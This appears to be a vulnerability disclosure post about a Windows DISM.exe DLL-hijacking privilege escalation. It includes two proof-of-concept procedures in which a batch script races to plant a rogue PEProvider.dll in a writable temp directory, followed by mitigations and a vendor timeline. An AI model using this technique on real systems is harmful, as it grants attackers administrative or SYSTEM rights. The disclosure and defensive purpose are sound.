Hi @ll,

Windows 7 introduced the "Deployment Image Servicing and Management"
tool DISM.exe; this command line program is called for example by
its predecessor PkgMgr.exe (a GUI program which requests elevated
privileges), or by Windows Update (which runs under SYSTEM account).

DISM.exe needs to be run with administrative privileges:
this condition is met in both cases named above.

When called with valid arguments, DISM.exe creates a directory
"%TEMP%\<new GUID>\" (which inherits the ACL of its parent), copies
the contents of the directory "%SystemRoot%\System32\DISM\" into
the newly created unique directory and then runs (the copy of)
DISMHOST.exe there.

When DISM.exe is called under SYSTEM account, %TEMP% resolves to
"%SystemRoot%\Temp"; when DISM.exe is called under a user account,
%TEMP% resolves to "%USERPROFILE%\AppData\Local\Temp" alias
"%LOCALAPPDATA%\Temp".

DISMHOST.exe tries to load PEProvider.dll, a DLL not present in
Windows, from "%TEMP%\<new GUID>\".

In the "protected" alias UAC-controlled administrator account
created during Windows setup [*], "%TEMP%\<new GUID>\" is writable
without administrative privileges: the unprivileged user (or any
process running without elevation under this user account) can
watch for the creation of this directory and then copy an arbitrary
(rogue) DLL as PEProvider.dll.

DISMHOST.exe loads and executes PEProvider.dll with administrative
privileges, resulting in an escalation of privilege.


The two weaknesses exploited here are of course well-known and well-
documented:

* for the unsafe TEMP directory see
  <https://cwe.mitre.org/data/definitions/379.html>;

* for the DLL hijacking see
  <https://cwe.mitre.org/data/definitions/426.html> and
  <https://cwe.mitre.org/data/definitions/427.html> plus
  <https://capec.mitre.org/data/definitions/471.html>.


Proof of concepts/demonstrations:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In the user account created during Windows setup perform the
following steps:

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>
   and save it as PEProvider.dll in an arbitrary directory, for
   example your "Downloads" folder
   (on 64-bit Windows use the 64-bit SENTINEL.DLL available in
   <http://home.arcor.de/skanthak/download/SENTINEL.CAB>: extract
   it and rename it to PEProvider.dll)

2. save the following 7 lines as foobar.xml anywhere you like, for
   example in your "Downloads" folder:

   <?xml version="1.0" encoding="utf-8" standalone="yes"?>
   <unattend xmlns="urn:schemas-microsoft-com:unattend">
       <servicing>
           <package action="Configure">
           </package>
       </servicing>
   </unattend>

3. save the following 4 lines as PEProvider.cmd anywhere you like,
   for example in your "Downloads" folder:

   :WAIT
   @If Not Exist "%TEMP%\????????-????-????-????-????????????" Goto :WAIT
   For /D %%! In ("%TEMP%\????????-????-????-????-????????????") Do Set foobar=%%!
   Copy "%USERPROFILE%\Downloads\PEProvider.dll" "%foobar%"

   and start this batch script per double-click, or using the
   the following command line per Start->Run:
       %COMSPEC% /K Call "%USERPROFILE%\Downloads\PEProvider.cmd"

4. run the following command line per Start->Run:
       PkgMgr.exe /N:"%USERPROFILE%\Downloads\foobar.xml"

5. notice the message boxes displayed by PEProvider.dll loaded
   and executed from DISMHOST.exe: PWNED!


This second proof of concept works under the same preconditions as
<https://bugs.chromium.org/p/project-zero/issues/detail?id=440>


In ANY user account that can create files in "%SystemRoot%\Temp\"
(see <https://support.microsoft.com/en-us/kb/950934> as example how
to achieve this) perform the following steps:

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>
   and save it as PEProvider.dll in an arbitrary directory, for
   example your "Downloads" folder
   (on 64-bit Windows use the 64-bit SENTINEL.DLL available in
   <http://home.arcor.de/skanthak/download/SENTINEL.CAB>: extract
   it and rename it to PEProvider.dll)

2. save the following 4 lines as PEProvider.cmd anywhere you like,
   for example in your "Downloads" folder:

   :WAIT
   @If Not Exist "%SystemRoot%\Temp\????????-????-????-????-????????????" Goto :WAIT
   For /D %%! In ("%SystemRoot%\Temp\????????-????-????-????-????????????") Do Set foobar=%%!
   Copy "%USERPROFILE%\Downloads\PEProvider.dll" "%foobar%"

   and start this batch script per double-click, or using the
   the following command line per Start->Run:
       %COMSPEC% /K Call "%USERPROFILE%\Downloads\PEProvider.cmd"

3. just wait ... DISM.exe will run in the background, sooner or
   later: PWNED!


Mitigation:
~~~~~~~~~~~

* Don't use "protected" administrator accounts, NEVER!

* Disable the default user account created during Windows setup,
  or demote it to a standard user account.

* Always use standard user accounts with DISABLED UAC-elevation.

* Practice STRICT privilege separation: UAC is a VERY BAD joke!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of "%TEMP%"; use
  <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to
  decode it to "deny execution of files in this directory for
  everyone, inheritable to all files in all subdirectories".


stay tuned
Stefan Kanthak


[*] according to Microsoft's own SIR reports, more than half of
    the Windows installations which send telemetry data have only
    one active user account, i.e. some hundred million Windows
    installations are susceptible to this design bug!

Timeline:
~~~~~~~~~

2016-05-31    vulnerability report sent to vendor

2016-06-02    vendor replies, opens MSRC Case 33699

              no more replies for 6 long weeks, despite
              <http://home.arcor.de/skanthak/policy.html>

2016-07-14    status request sent to vendor

2016-07-15    vendor replies:
              "DISM will create a temporary directory inside the
               administrators %TEMP%, which normal/standard users
               do NOT have access to.
               As such, we are resolving this as 'by design'."

2016-07-15    OUCH!
              "There is no separate 'administrators' %TEMP% in the
               default user account created during Windows setup!"

              NO RESPONSE

2016-07-23    report published